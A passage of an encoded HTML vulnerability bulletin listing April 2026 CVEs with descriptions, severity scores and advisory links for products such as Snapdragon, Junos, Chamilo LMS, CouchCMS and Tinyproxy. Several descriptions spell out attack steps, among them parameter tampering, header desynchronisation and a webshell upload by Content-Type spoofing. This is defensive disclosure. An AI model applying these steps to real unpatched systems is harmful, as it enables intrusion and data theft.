<a href=3D"https://docs.qualcomm.com/product/publicresources/securitybullet= in/april-2026-bulletin.html" target=3D"_blank" rel=3D"noopener">https://doc= s.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin= .html</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Qualcomm, Inc.--Snapdragon</td>
<td>Memory Corruption when accessing an output buffer without validating it=
s size during IOCTL processing.</td>
<td>2026-04-06</td>
<td>7.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-21373" target=3D= "_blank" rel=3D"noopener">CVE-2026-21373</a></td>

<a href=3D"https://docs.qualcomm.com/product/publicresources/securitybullet= in/april-2026-bulletin.html" target=3D"_blank" rel=3D"noopener">https://doc= s.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin= .html</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Qualcomm, Inc.--Snapdragon</td>
<td>Memory Corruption when processing auxiliary sensor input/output control=
commands with insufficient buffer size validation.</td>
<td>2026-04-06</td>
<td>7.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-21374" target=3D= "_blank" rel=3D"noopener">CVE-2026-21374</a></td>

<a href=3D"https://docs.qualcomm.com/product/publicresources/securitybullet= in/april-2026-bulletin.html" target=3D"_blank" rel=3D"noopener">https://doc= s.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin= .html</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Qualcomm, Inc.--Snapdragon</td>
<td>Memory Corruption when accessing an output buffer without validating it=
s size during IOCTL processing.</td>
<td>2026-04-06</td>
<td>7.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-21375" target=3D= "_blank" rel=3D"noopener">CVE-2026-21375</a></td>

<a href=3D"https://docs.qualcomm.com/product/publicresources/securitybullet= in/april-2026-bulletin.html" target=3D"_blank" rel=3D"noopener">https://doc= s.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin= .html</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Qualcomm, Inc.--Snapdragon</td>
<td>Memory Corruption when accessing an output buffer without validating it=
s size during IOCTL processing in a camera sensor driver.</td> <td>2026-04-06</td>
<td>7.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-21376" target=3D= "_blank" rel=3D"noopener">CVE-2026-21376</a></td>

<a href=3D"https://docs.qualcomm.com/product/publicresources/securitybullet= in/april-2026-bulletin.html" target=3D"_blank" rel=3D"noopener">https://doc= s.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin= .html</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Qualcomm, Inc.--Snapdragon</td>
<td>Memory Corruption when accessing an output buffer without validating it=
s size during IOCTL processing in a camera sensor driver.</td> <td>2026-04-06</td>
<td>7.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-21378" target=3D= "_blank" rel=3D"noopener">CVE-2026-21378</a></td>

<a href=3D"https://docs.qualcomm.com/product/publicresources/securitybullet= in/april-2026-bulletin.html" target=3D"_blank" rel=3D"noopener">https://doc= s.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin= .html</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Qualcomm, Inc.--Snapdragon</td>
<td>Memory Corruption when using deprecated DMABUF IOCTL calls to manage vi= deo memory.</td>
<td>2026-04-06</td>
<td>7.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-21380" target=3D= "_blank" rel=3D"noopener">CVE-2026-21380</a></td>

<a href=3D"https://docs.qualcomm.com/product/publicresources/securitybullet= in/april-2026-bulletin.html" target=3D"_blank" rel=3D"noopener">https://doc= s.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin= .html</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Qualcomm, Inc.--Snapdragon</td>
<td>Transient DOS when receiving a service data frame with excessive length=
during device matching over a neighborhood awareness network protocol conn= ection.</td>
<td>2026-04-06</td>
<td>7.6</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-21381" target=3D= "_blank" rel=3D"noopener">CVE-2026-21381</a></td>

<a href=3D"https://docs.qualcomm.com/product/publicresources/securitybullet= in/april-2026-bulletin.html" target=3D"_blank" rel=3D"noopener">https://doc= s.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin= .html</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Qualcomm, Inc.--Snapdragon</td>
<td>Memory Corruption when handling power management requests with improper=
ly sized input/output buffers.</td>
<td>2026-04-06</td>
<td>7.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-21382" target=3D= "_blank" rel=3D"noopener">CVE-2026-21382</a></td>

<a href=3D"https://docs.qualcomm.com/product/publicresources/securitybullet= in/april-2026-bulletin.html" target=3D"_blank" rel=3D"noopener">https://doc= s.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin= .html</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Juniper Networks--Junos OS</td>
<td>A UNIX Symbolic Link (Symlink) Following vulnerability in the CLI of Ju= niper Networks Junos OS allows a local, authenticated attacker with low pri= vileges to escalate their privileges to root which will lead to a complete = compromise of the system. When after a user has performed a specific 'file = link ...' CLI operation, another user commits (unrelated configuration chan= ges), the first user can login as root. This issue affects Junos OS: * all = versions before 23.2R2-S7, * 23.4 versions before 23.4R2-S6, * 24.2 version=
s before 24.2R2-S3, * 24.4 versions before 24.4R2-S2, * 25.2 versions befor=
e 25.2R2. This issue does not affect versions 25.4R1 or later.</td> <td>2026-04-09</td>
<td>7.3</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-21916" target=3D= "_blank" rel=3D"noopener">CVE-2026-21916</a></td>

<a href=3D"https://kb.juniper.net/JSA107807" target=3D"_blank" rel=3D"noope= ner">https://kb.juniper.net/JSA107807</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Dolibarr--Dolibarr ERP/CRM</td>
<td>Dolibarr ERP/CRM versions prior to 23.0.2 contain an authenticated remo=
te code execution vulnerability in the dol_eval_standard() function that fa= ils to apply forbidden string checks in whitelist mode and does not detect = PHP dynamic callable syntax. Attackers with administrator privileges can in= ject malicious payloads through computed extrafields or other evaluation pa= ths using PHP dynamic callable syntax to bypass validation and achieve arbi= trary command execution via eval().</td>
<td>2026-04-07</td>
<td>7.2</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-22666" target=3D= "_blank" rel=3D"noopener">CVE-2026-22666</a></td>

<a href=3D"https://jivasecurity.com/writeups/dolibarr-remote-code-execution= -cve-2026-22666" target=3D"_blank" rel=3D"noopener">https://jivasecurity.co= m/writeups/dolibarr-remote-code-execution-cve-2026-22666</a><br><a href=3D"= https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-vmvw-qq8w-wqh=
g" target=3D"_blank" rel=3D"noopener">https://github.com/Dolibarr/dolibarr/= security/advisories/GHSA-vmvw-qq8w-wqhg</a><br><a href=3D"https://github.co= m/Dolibarr/dolibarr/commit/6f425521b3e6f9f27eca05228e02093dbaa40dea" target= =3D"_blank" rel=3D"noopener">https://github.com/Dolibarr/dolibarr/commit/6f= 425521b3e6f9f27eca05228e02093dbaa40dea</a><br><a href=3D"https://github.com= /Dolibarr/dolibarr/releases/tag/23.0.2" target=3D"_blank" rel=3D"noopener">= https://github.com/Dolibarr/dolibarr/releases/tag/23.0.2</a><br><a href=3D"= https://www.vulncheck.com/advisories/dolibarr-erp-crm-authenticated-rce-via= -dol-eval-standard" target=3D"_blank" rel=3D"noopener">https://www.vulnchec= k.com/advisories/dolibarr-erp-crm-authenticated-rce-via-dol-eval-standard</= a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">HKUDS--OpenHarness</td>
<td>OpenHarness prior to commit 166fcfe=C2=A0contains an improper access co= ntrol vulnerability in built-in file tools due to inconsistent parameter ha= ndling in permission enforcement, allowing attackers who can influence agen=
t tool execution to read arbitrary local files outside the intended reposit= ory scope. Attackers can exploit the path parameter not being passed to the=
PermissionChecker in read_file, write_file, edit_file, and notebook_edit t= ools to bypass deny rules and access sensitive files such as configuration = files, credentials, and SSH material, or create and overwrite files in rest= ricted host paths in full_auto mode.</td>
<td>2026-04-07</td>
<td>7.1</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-22682" target=3D= "_blank" rel=3D"noopener">CVE-2026-22682</a></td>

<a href=3D"https://github.com/HKUDS/OpenHarness/pull/32" target=3D"_blank" = rel=3D"noopener">https://github.com/HKUDS/OpenHarness/pull/32</a><br><a hre= f=3D"https://github.com/HKUDS/OpenHarness/commit/166fcfefb7614dbac51bd061f5= 6542725b0298e9" target=3D"_blank" rel=3D"noopener">https://github.com/HKUDS= /OpenHarness/commit/166fcfefb7614dbac51bd061f56542725b0298e9</a><br><a href= =3D"https://www.vulncheck.com/advisories/openharness-improper-access-contro= l-via-file-tools" target=3D"_blank" rel=3D"noopener">https://www.vulncheck.= com/advisories/openharness-improper-access-control-via-file-tools</a><br>= =C2=A0</td>
</tr>

<td class=3D"vendor-product">VMware--Spring Cloud Gateway</td>
<td>When configuring SSL bundles in Spring Cloud Gateway by using the confi= guration property=C2=A0spring.ssl.bundle, the configuration was silently ig= nored and the default SSL configuration was used instead. Note: The=C2=A04.= 2.x=C2=A0branch is no longer under open source support. If you are using Sp= ring Cloud Gateway=C2=A04.2.0=C2=A0and are not an enterprise customer, you = can upgrade to any Spring Cloud Gateway=C2=A04.2.x=C2=A0release newer than= =C2=A04.2.0=C2=A0 available on Maven Centeral https://repo1.maven.org/maven= 2/org/springframework/cloud/spring-cloud-gateway/ . Ideally if you are not =
an enterprise customer, you should be upgrading to=C2=A05.0.2=C2=A0or=C2=A0= 5.1.1=C2=A0which are the current supported open source releases.</td> <td>2026-04-10</td>
<td>7.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-22750" target=3D= "_blank" rel=3D"noopener">CVE-2026-22750</a></td>

<a href=3D"https://spring.io/security/cve-2026-22750" target=3D"_blank" rel= =3D"noopener">https://spring.io/security/cve-2026-22750</a><br>=C2=A0</td> </tr>

<td class=3D"vendor-product">Dell--Elastic Cloud Storage</td>
<td>Dell Elastic Cloud Storage, version 3.8.1.7 and prior, and Dell ObjectS= cale,=C2=A0versions prior to 4.1.0.3 and version 4.2.0.0, contains an Inser= tion of Sensitive Information into Log File vulnerability. A low privileged=
attacker with local access could potentially exploit this vulnerability, l= eading to secret exposure. The attacker may be able to use the exposed secr=
et to access the vulnerable system with privileges of the compromised accou= nt.</td>
<td>2026-04-08</td>
<td>7.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-28261" target=3D= "_blank" rel=3D"noopener">CVE-2026-28261</a></td>

<a href=3D"https://www.dell.com/support/kbdoc/en-us/000449325/dsa-2026-143-= security-update-for-dell-objectscale-prior-to-4-1-0-3-and-4-2-0-0-insertion= -of-sensitive-information-into-log-file-vulnerability" target=3D"_blank" re= l=3D"noopener">https://www.dell.com/support/kbdoc/en-us/000449325/dsa-2026-= 143-security-update-for-dell-objectscale-prior-to-4-1-0-3-and-4-2-0-0-inser= tion-of-sensitive-information-into-log-file-vulnerability</a><br>=C2=A0</td=

</tr>

<td class=3D"vendor-product">CouchCMS--CouchCMS</td>
<td>CouchCMS contains a privilege escalation vulnerability that allows auth= enticated Admin-level users to create SuperAdmin accounts by tampering with=
the f_k_levels_list parameter in user creation requests. Attackers can mod= ify the parameter value from 4 to 10 in the HTTP request body to bypass aut= horization validation and gain full application control, circumventing rest= rictions on SuperAdmin account creation and privilege assignment.</td> <td>2026-04-10</td>
<td>7.2</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-29002" target=3D= "_blank" rel=3D"noopener">CVE-2026-29002</a></td>

<a href=3D"https://gist.github.com/thepiyushkumarshukla/477e2d2bbbe8cc3ec0d= 640c50f0cf9e1" target=3D"_blank" rel=3D"noopener">https://gist.github.com/t= hepiyushkumarshukla/477e2d2bbbe8cc3ec0d640c50f0cf9e1</a><br><a href=3D"http= s://www.couchcms.com/" target=3D"_blank" rel=3D"noopener">https://www.couch= cms.com/</a><br><a href=3D"https://www.vulncheck.com/advisories/couchcms-pr= ivilege-escalation-via-f-k-levels-list-parameter" target=3D"_blank" rel=3D"= noopener">https://www.vulncheck.com/advisories/couchcms-privilege-escalatio= n-via-f-k-levels-list-parameter</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">glpi-project--glpi</td>
<td>GLPI is a free asset and IT management software package. From 10.0.0 to=
before 10.0.24 and 11.0.6, an authenticated user can perform a SQL injecti=
on via the logs export feature. This vulnerability is fixed in 10.0.24 and = 11.0.6.</td>
<td>2026-04-06</td>
<td>7.2</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-29047" target=3D= "_blank" rel=3D"noopener">CVE-2026-29047</a></td>

<a href=3D"https://github.com/glpi-project/glpi/security/advisories/GHSA-3m= 49-qf92-vccr" target=3D"_blank" rel=3D"noopener">https://github.com/glpi-pr= oject/glpi/security/advisories/GHSA-3m49-qf92-vccr</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">open-telemetry--opentelemetry-go</td> <td>OpenTelemetry-Go is the Go implementation of OpenTelemetry. From 1.36.0=
to 1.40.0, multi-value baggage: header extraction parses each header field= -value independently and aggregates members across values. This allows an a= ttacker to amplify cpu and allocations by sending many baggage: header line=
s, even when each individual value is within the 8192-byte per-value parse = limit. This vulnerability is fixed in 1.41.0.</td>
<td>2026-04-07</td>
<td>7.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-29181" target=3D= "_blank" rel=3D"noopener">CVE-2026-29181</a></td>

<a href=3D"https://github.com/open-telemetry/opentelemetry-go/security/advi= sories/GHSA-mh2q-q3fh-2475" target=3D"_blank" rel=3D"noopener">https://gith= ub.com/open-telemetry/opentelemetry-go/security/advisories/GHSA-mh2q-q3fh-2= 475</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Tinyproxy Project--Tinyproxy</td>
<td>Tinyproxy through 1.11.3 is vulnerable to HTTP request parsing desynchr= onization due to a case-sensitive comparison of the Transfer-Encoding heade=
r in src/reqs.c. The is_chunked_transfer() function uses strcmp() to compar=
e the header value against "chunked", even though RFC 7230 specifies that t= ransfer-coding names are case-insensitive. By sending a request with Transf= er-Encoding: Chunked, an unauthenticated remote attacker can cause Tinyprox=
y to misinterpret the request as having no body. In this state, Tinyproxy s= ets content_length.client to -1, skips pull_client_data_chunked(), forwards=
request headers upstream, and transitions into relay_connection() raw TCP = forwarding while unread body data remains buffered. This leads to inconsist= ent request state between Tinyproxy and backend servers. RFC-compliant back= ends (e.g., Node.js, Nginx) will continue waiting for chunked body data, ca= using connections to hang indefinitely. This behavior enables application-l= evel denial of service through backend worker exhaustion. Additionally, in = deployments where Tinyproxy is used for request-body inspection, filtering,=
or security enforcement, the unread body may be forwarded without proper i= nspection, resulting in potential security control bypass.</td> <td>2026-04-07</td>
<td>7.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31842" target=3D= "_blank" rel=3D"noopener">CVE-2026-31842</a></td>

<a href=3D"https://github.com/tinyproxy/tinyproxy/issues/604" target=3D"_bl= ank" rel=3D"noopener">Upstream issue report and reproduction details</a><br= ><a href=3D"https://github.com/tinyproxy/tinyproxy" target=3D"_blank" rel= =3D"noopener">Tinyproxy upstream project</a><br><a href=3D"https://datatrac= ker.ietf.org/doc/html/rfc7230" target=3D"_blank" rel=3D"noopener">RFC 7230:=
transfer-coding names are case-insensitive</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">chamilo--chamilo-lms</td>
<td>Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0= -RC.3, in main/lp/aicc_hacp.php, user-controlled request parameters are dir= ectly used to set the PHP session ID before loading global bootstrap. This = leads to session fixation. This vulnerability is fixed in 1.11.38 and 2.0.0= -RC.3.</td>
<td>2026-04-10</td>
<td>7.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31940" target=3D= "_blank" rel=3D"noopener">CVE-2026-31940</a></td>

<a href=3D"https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-= 4gp7-cfjh-77gv" target=3D"_blank" rel=3D"noopener">https://github.com/chami= lo/chamilo-lms/security/advisories/GHSA-4gp7-cfjh-77gv</a><br><a href=3D"ht= tps://github.com/chamilo/chamilo-lms/commit/ce0192c62e48c9d9474d915c541b327= 4844afbf9" target=3D"_blank" rel=3D"noopener">https://github.com/chamilo/ch= amilo-lms/commit/ce0192c62e48c9d9474d915c541b3274844afbf9</a><br><a href=3D= "https://github.com/chamilo/chamilo-lms/commit/e337b7cc74a0276a0b4f91f92822= 04d20cac1869" target=3D"_blank" rel=3D"noopener">https://github.com/chamilo= /chamilo-lms/commit/e337b7cc74a0276a0b4f91f9282204d20cac1869</a><br>=C2=A0<=

</tr>

<td class=3D"vendor-product">chamilo--chamilo-lms</td>
<td>Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0= -RC.3, Chamilo LMS contains a Server-Side Request Forgery (SSRF) vulnerabil= ity in the Social Wall feature. The endpoint read_url_with_open_graph accep=
ts a URL from the user via the social_wall_new_msg_main POST parameter and = performs two server-side HTTP requests to that URL without validating wheth=
er the target is an internal or external resource. This allows an authentic= ated attacker to force the server to make arbitrary HTTP requests to intern=
al services, scan internal ports, and access cloud instance metadata. This = vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.</td>
<td>2026-04-10</td>
<td>7.7</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31941" target=3D= "_blank" rel=3D"noopener">CVE-2026-31941</a></td>

<a href=3D"https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-= q74c-mx8x-489h" target=3D"_blank" rel=3D"noopener">https://github.com/chami= lo/chamilo-lms/security/advisories/GHSA-q74c-mx8x-489h</a><br><a href=3D"ht= tps://github.com/chamilo/chamilo-lms/commit/e3790c5f0ff3b4dc547c2099fadf5c4= 38c1bb265" target=3D"_blank" rel=3D"noopener">https://github.com/chamilo/ch= amilo-lms/commit/e3790c5f0ff3b4dc547c2099fadf5c438c1bb265</a><br><a href=3D= "https://github.com/chamilo/chamilo-lms/commit/ea6b7b7e90580c9b01dc4bcafe4a= d737061e0ead" target=3D"_blank" rel=3D"noopener">https://github.com/chamilo= /chamilo-lms/commit/ea6b7b7e90580c9b01dc4bcafe4ad737061e0ead</a><br>=C2=A0<=

</tr>

<td class=3D"vendor-product">chartbrew--chartbrew</td>
<td>Chartbrew is an open-source web application that can connect directly t=
o databases and APIs and use the data to create charts. Prior to 4.9.0, a c= ross-tenant authorization bypass exists in Chartbrew in GET /team/:team_id/= template/generate/:project_id. The GET handler calls checkAccess(req, "upda= teAny", "chart") without awaiting the returned promise, and it does not ver= ify that the supplied project_id belongs to req.params.team_id or to the ca= ller's team. As a result, an authenticated attacker with valid template-gen= eration permissions in their own team can request the template model for a = project belonging to another team and receive victim project data. This vul= nerability is fixed in 4.9.0.</td>
<td>2026-04-10</td>
<td>7.7</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-32252" target=3D= "_blank" rel=3D"noopener">CVE-2026-32252</a></td>

<a href=3D"https://github.com/chartbrew/chartbrew/security/advisories/GHSA-= mw4f-cf22-qpcj" target=3D"_blank" rel=3D"noopener">https://github.com/chart= brew/chartbrew/security/advisories/GHSA-mw4f-cf22-qpcj</a><br><a href=3D"ht= tps://github.com/chartbrew/chartbrew/commit/bf5919043d3587fcbe76123aaabd9a0= a9d1033f1" target=3D"_blank" rel=3D"noopener">https://github.com/chartbrew/= chartbrew/commit/bf5919043d3587fcbe76123aaabd9a0a9d1033f1</a><br>=C2=A0</td=

</tr>

<td class=3D"vendor-product">Red Hat--mirror registry for Red Hat OpenShift= </td>
<td>A flaw was found in Red Hat Quay's container image upload process. An a= uthenticated user with push access to any repository on the registry can in= terfere with image uploads in progress by other users, including those in r= epositories they do not have access to. This could allow the attacker to re= ad, modify, or cancel another user's in-progress image upload.</td> <td>2026-04-08</td>
<td>7.1</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-32589" target=3D= "_blank" rel=3D"noopener">CVE-2026-32589</a></td>

<a href=3D"https://access.redhat.com/security/cve/CVE-2026-32589" target=3D= "_blank" rel=3D"noopener">https://access.redhat.com/security/cve/CVE-2026-3= 2589</a><br><a href=3D"https://bugzilla.redhat.com/show_bug.cgi?id=3D244696=
3" target=3D"_blank" rel=3D"noopener">RHBZ#2446963</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Red Hat--mirror registry for Red Hat OpenShift= </td>
<td>A flaw was found in Red Hat Quay's handling of resumable container imag=
e layer uploads. The upload process stores intermediate data in the databas=
e using a format that, if tampered with, could allow an attacker to execute=
arbitrary code on the Quay server.</td>
<td>2026-04-08</td>
<td>7.1</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-32590" target=3D= "_blank" rel=3D"noopener">CVE-2026-32590</a></td>

<a href=3D"https://access.redhat.com/security/cve/CVE-2026-32590" target=3D= "_blank" rel=3D"noopener">https://access.redhat.com/security/cve/CVE-2026-3= 2590</a><br><a href=3D"https://bugzilla.redhat.com/show_bug.cgi?id=3D244696=
4" target=3D"_blank" rel=3D"noopener">RHBZ#2446964</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">NI--LabVIEW</td>
<td>There is a memory corruption vulnerability due to an out-of-bounds writ=
e when loading a corrupted LVLIB file in NI LabVIEW.=C2=A0 This vulnerabili=
ty may result in information disclosure or arbitrary code execution. Succes= sful exploitation requires an attacker to get a user to open a specially cr= afted .lvlib file. This vulnerability affects NI LabVIEW 2026 Q1 (26.1.0) a=
nd prior versions.</td>
<td>2026-04-07</td>
<td>7.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-32860" target=3D= "_blank" rel=3D"noopener">CVE-2026-32860</a></td>

<a href=3D"https://www.ni.com/en/support/security/available-critical-and-se= curity-updates-for-ni-software/2026/lv-project-library-file-parsing-memory-= corruption-vulnerability-in-ni-labview.html" target=3D"_blank" rel=3D"noope= ner">https://www.ni.com/en/support/security/available-critical-and-security= -updates-for-ni-software/2026/lv-project-library-file-parsing-memory-corrup= tion-vulnerability-in-ni-labview.html</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">NI--LabVIEW</td>
<td>There is a memory corruption vulnerability due to an out-of-bounds writ=
e when loading a corrupted LVCLASS file in NI LabVIEW.=C2=A0 This vulnerabi= lity may result in information disclosure or arbitrary code execution. Succ= essful exploitation requires an attacker to get a user to open a specially = crafted .lvclass file. This vulnerability affects NI LabVIEW 2026 Q1 (26.1.=
0) and prior versions.</td>
<td>2026-04-07</td>
<td>7.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-32861" target=3D= "_blank" rel=3D"noopener">CVE-2026-32861</a></td>

<a href=3D"https://www.ni.com/en/support/security/available-critical-and-se= curity-updates-for-ni-software/2026/lv-class-file-parsing-memory-corruption= -vulnerability-in-ni-labview.html" target=3D"_blank" rel=3D"noopener">https= ://www.ni.com/en/support/security/available-critical-and-security-updates-f= or-ni-software/2026/lv-class-file-parsing-memory-corruption-vulnerability-i= n-ni-labview.html</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">NI--LabVIEW</td>
<td>There is a memory corruption vulnerability due to an out-of-bounds writ=
e in ResFileFactory::InitResourceMgr() in NI LabVIEW.=C2=A0 This vulnerabil= ity may result in information disclosure or arbitrary code execution. Succe= ssful exploitation requires an attacker to get a user to open a specially c= rafted VI file. This vulnerability affects NI LabVIEW 2026 Q1 (26.1.0) and = prior versions.</td>
<td>2026-04-07</td>
<td>7.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-32862" target=3D= "_blank" rel=3D"noopener">CVE-2026-32862</a></td>

<a href=3D"https://www.ni.com/en/support/security/available-critical-and-se= curity-updates-for-ni-software/2026/memory-corruption-vulnerabilities-in-ni= -labview.html" target=3D"_blank" rel=3D"noopener">https://www.ni.com/en/sup= port/security/available-critical-and-security-updates-for-ni-software/2026/= memory-corruption-vulnerabilities-in-ni-labview.html</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">NI--LabVIEW</td>
<td>There is a memory corruption vulnerability due to an out-of-bounds read=
in sentry_transaction_context_set_operation() in NI LabVIEW.=C2=A0 This vu= lnerability may result in information disclosure or arbitrary code executio=
n. Successful exploitation requires an attacker to get a user to open a spe= cially crafted VI file. This vulnerability affects NI LabVIEW 2026 Q1 (26.1= .0) and prior versions.</td>
<td>2026-04-07</td>
<td>7.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-32863" target=3D= "_blank" rel=3D"noopener">CVE-2026-32863</a></td>

<a href=3D"https://www.ni.com/en/support/security/available-critical-and-se= curity-updates-for-ni-software/2026/memory-corruption-vulnerabilities-in-ni= -labview.html" target=3D"_blank" rel=3D"noopener">https://www.ni.com/en/sup= port/security/available-critical-and-security-updates-for-ni-software/2026/= memory-corruption-vulnerabilities-in-ni-labview.html</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">NI--LabVIEW</td>
<td>There is a memory corruption vulnerability due to an out-of-bounds read=
in mgcore_SH_25_3!aligned_free() in NI LabVIEW.=C2=A0 This vulnerability m=
ay result in information disclosure or arbitrary code execution. Successful=
exploitation requires an attacker to get a user to open a specially crafte=
d VI file. This vulnerability affects NI LabVIEW 2026 Q1 (26.1.0) and prior=
versions.</td>
<td>2026-04-07</td>
<td>7.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-32864" target=3D= "_blank" rel=3D"noopener">CVE-2026-32864</a></td>

<a href=3D"https://www.ni.com/en/support/security/available-critical-and-se= curity-updates-for-ni-software/2026/memory-corruption-vulnerabilities-in-ni= -labview.html" target=3D"_blank" rel=3D"noopener">https://www.ni.com/en/sup= port/security/available-critical-and-security-updates-for-ni-software/2026/= memory-corruption-vulnerabilities-in-ni-labview.html</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">chamilo--chamilo-lms</td>
<td>Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0= -RC.3, an Insecure Direct Object Reference (IDOR) vulnerability in the grad= ebook result view page allows any authenticated teacher to delete any stude= nt's grade result across the entire platform by manipulating the delete_mar=
k or resultdelete GET parameters. No ownership or course-scope verification=
is performed. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.</td> <td>2026-04-10</td>
<td>7.1</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-32894" target=3D= "_blank" rel=3D"noopener">CVE-2026-32894</a></td>

<a href=3D"https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-= rqpg-p95v-fv98" target=3D"_blank" rel=3D"noopener">https://github.com/chami= lo/chamilo-lms/security/advisories/GHSA-rqpg-p95v-fv98</a><br><a href=3D"ht= tps://github.com/chamilo/chamilo-lms/commit/3b03306d1a0301a81b9284e86893b27= f518ab151" target=3D"_blank" rel=3D"noopener">https://github.com/chamilo/ch= amilo-lms/commit/3b03306d1a0301a81b9284e86893b27f518ab151</a><br><a href=3D= "https://github.com/chamilo/chamilo-lms/commit/740f5a6e192a52a3adde3c3241c8= 6401b1d2c519" target=3D"_blank" rel=3D"noopener">https://github.com/chamilo= /chamilo-lms/commit/740f5a6e192a52a3adde3c3241c86401b1d2c519</a><br>=C2=A0<=

</tr>

<td class=3D"vendor-product">chamilo--chamilo-lms</td>
<td>Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0= -RC.3, an Insecure Direct Object Reference (IDOR) vulnerability in the grad= ebook evaluation edit page allows any authenticated teacher to view and mod= ify the settings (name, max score, weight) of evaluations belonging to any = other course by manipulating the editeval GET parameter. This vulnerability=
is fixed in 1.11.38 and 2.0.0-RC.3.</td>
<td>2026-04-10</td>
<td>7.1</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-32930" target=3D= "_blank" rel=3D"noopener">CVE-2026-32930</a></td>

<a href=3D"https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-= 9h22-wrg7-82q6" target=3D"_blank" rel=3D"noopener">https://github.com/chami= lo/chamilo-lms/security/advisories/GHSA-9h22-wrg7-82q6</a><br><a href=3D"ht= tps://github.com/chamilo/chamilo-lms/commit/63e1e6d3d717bd537c7c61719416da3= 5aaa658dd" target=3D"_blank" rel=3D"noopener">https://github.com/chamilo/ch= amilo-lms/commit/63e1e6d3d717bd537c7c61719416da35aaa658dd</a><br><a href=3D= "https://github.com/chamilo/chamilo-lms/commit/f03f681df939db0429edc8414fb3= ce4e4b80d79d" target=3D"_blank" rel=3D"noopener">https://github.com/chamilo= /chamilo-lms/commit/f03f681df939db0429edc8414fb3ce4e4b80d79d</a><br>=C2=A0<=

</tr>

<td class=3D"vendor-product">chamilo--chamilo-lms</td>
<td>Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0= -RC.3, an unrestricted file upload vulnerability in the exercise sound uplo=
ad function allows an authenticated teacher to upload a PHP webshell by spo= ofing the Content-Type header to audio/mpeg. The uploaded file retains its = original .php extension and is placed in a web-accessible directory, enabli=
ng Remote Code Execution as the web server user (www-data). This vulnerabil= ity is fixed in 1.11.38 and 2.0.0-RC.3.</td>
<td>2026-04-10</td>
<td>7.5</td>
